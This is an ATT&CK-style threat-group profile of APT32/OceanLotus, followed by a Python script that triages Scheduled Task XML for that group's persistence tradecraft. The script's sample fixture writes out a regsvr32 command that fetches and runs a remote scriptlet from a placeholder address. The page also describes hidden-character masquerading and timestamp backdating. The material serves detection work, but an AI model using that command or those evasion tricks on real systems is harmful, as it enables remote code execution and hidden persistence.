Group: APT32, OceanLotus Group

APT32, OceanLotus Group
ID G0050
Aliases APT32, OceanLotus Group

APT32 is a threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as foreign governments, dissidents, and journalists, and has made extensive use of strategic web compromises (watering-hole attacks on sites its targets visit) to gain initial access. The group is believed to be Vietnam-based.[1][2]

Alias Descriptions

  • APT32 - [1][2]
  • OceanLotus Group - [1][2]

Techniques Used

  • Scheduled Task - APT32 has used scheduled tasks to persist on victim systems.[1]
  • Regsvr32 - APT32 created a Scheduled Task that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory.[1]
  • PowerShell - APT32 has used PowerShell-based tools and shellcode loaders for execution.[1]
  • Timestomp - APT32 has used scheduled task raw XML with a backdated timestamp of June 2, 2016.[1]
  • Masquerading - APT32 has used hidden or non-printing characters to help masquerade file names on a system, such as appending a Unicode no-break space character to a legitimate service name.[1]
  • Valid Accounts - APT32 has used legitimate local admin account credentials.[1]
  • Web Shell - APT32 has used Web shells to maintain access to victim websites.[2]
  • Remote File Copy - APT32 has added JavaScript to victim websites to download additional frameworks that profile and compromise website visitors.[2]
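Four of the techniques above (Scheduled Task, Regsvr32, Timestomp, Masquerading) leave their traces in the same artifact: the task definition XML under %SystemRoot%\System32\Tasks and the name of the task file. The following triage routine is an added example written for this page; it is not ATT&CK content and not tooling attributed to APT32. It parses a task XML export and flags the three patterns described in the reporting: a task name padded with an invisible character, a <RegistrationInfo><Date> far earlier than the moment the task actually appeared, and a regsvr32.exe action that pulls a COM scriptlet from a URL via scrobj.dll. The task name, the URL 198.51.100.7, the observation date and the one-day tolerance are all constructed assumptions for the sample, not values from the page.

```python
"""Triage a Windows Scheduled Task definition for the tradecraft described above.

Added example for this page; not code from ATT&CK, FireEye, Volexity or APT32.
The task name, XML and timestamps below are constructed samples.
"""
import re
import unicodedata
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

# Namespace used by Task Scheduler XML and `schtasks /query /xml` exports.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# regsvr32 told to fetch its "install" scriptlet over HTTP(S): /i:http://... scrobj.dll
SCRIPTLET_URL = re.compile(r'/i:\s*"?https?://', re.IGNORECASE)

# Assumption: a claimed registration date more than a day before the task really
# appeared is treated as backdated (tasks imported from an old export can trip this).
BACKDATE_TOLERANCE = timedelta(days=1)


def hidden_characters(name):
    """Return code points in *name* that are invisible when rendered: any Unicode
    space separator other than U+0020, line/paragraph separators, and control or
    format characters. A trailing U+00A0 NO-BREAK SPACE is the case from the text."""
    return [
        "U+%04X" % ord(ch)
        for ch in name
        if ch != " " and unicodedata.category(ch) in ("Zs", "Zl", "Zp", "Cc", "Cf")
    ]


def triage_task(task_name, xml_text, observed_at):
    """Return a list of finding strings for one task.

    task_name   - name of the task (the file name under System32\\Tasks)
    xml_text    - the task definition XML, without a UTF-16 declaration
    observed_at - when the task actually appeared, e.g. the task file's creation
                  time or the Security 4698 'task created' event time (naive UTC)
    """
    findings = []

    hidden = hidden_characters(task_name)
    if hidden:
        findings.append("masquerading: hidden characters in task name " + ",".join(hidden))

    root = ET.fromstring(xml_text)

    # Timestomp: <Date> is plain text written by whoever authored the XML, so it can
    # claim anything. Compare it with evidence the attacker did not control.
    date_el = root.find("t:RegistrationInfo/t:Date", NS)
    if date_el is not None and date_el.text:
        claimed = datetime.strptime(date_el.text.strip()[:19], "%Y-%m-%dT%H:%M:%S")
        gap = observed_at - claimed
        if gap > BACKDATE_TOLERANCE:
            findings.append(
                "timestomp: registration date %s predates task creation %s by %d days"
                % (claimed.date(), observed_at.date(), gap.days)
            )

    # Regsvr32: a scriptlet URL or scrobj.dll in the arguments of a regsvr32 action.
    for exec_el in root.findall("t:Actions/t:Exec", NS):
        cmd = exec_el.findtext("t:Command", default="", namespaces=NS).strip()
        args = exec_el.findtext("t:Arguments", default="", namespaces=NS).strip()
        if "regsvr32" in cmd.lower() and (
            SCRIPTLET_URL.search(args) or "scrobj.dll" in args.lower()
        ):
            findings.append("regsvr32 COM scriptlet execution: %s %s" % (cmd, args))

    return findings


# Constructed sample: legitimate-looking name with a no-break space appended.
SAMPLE_TASK_NAME = "GoogleUpdateTaskMachineUA\u00a0"

# Constructed sample task XML; the date mirrors the June 2, 2016 value from the text,
# the URL is a documentation (TEST-NET-2) address, not a real indicator.
SAMPLE_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2016-06-02T00:00:00</Date>
    <Author>Microsoft Corporation</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>regsvr32.exe</Command>
      <Arguments>/s /n /u /i:http://198.51.100.7/update.sct scrobj.dll</Arguments>
    </Exec>
  </Actions>
</Task>
"""

# Constructed sample: creation time of the task file as seen by the responder.
SAMPLE_OBSERVED_AT = datetime(2017, 3, 20, 9, 14, 0)

if __name__ == "__main__":
    for finding in triage_task(SAMPLE_TASK_NAME, SAMPLE_TASK_XML, SAMPLE_OBSERVED_AT):
        print(finding)
```

The date check is only as good as the independent timestamp you feed it: pair the XML <Date> with the task file's $STANDARD_INFORMATION and $FILE_NAME creation times or with the 4698 event, since those are what the authored XML cannot rewrite. The scrobj.dll test also fires on a local .sct path, which is still worth a look even without a URL.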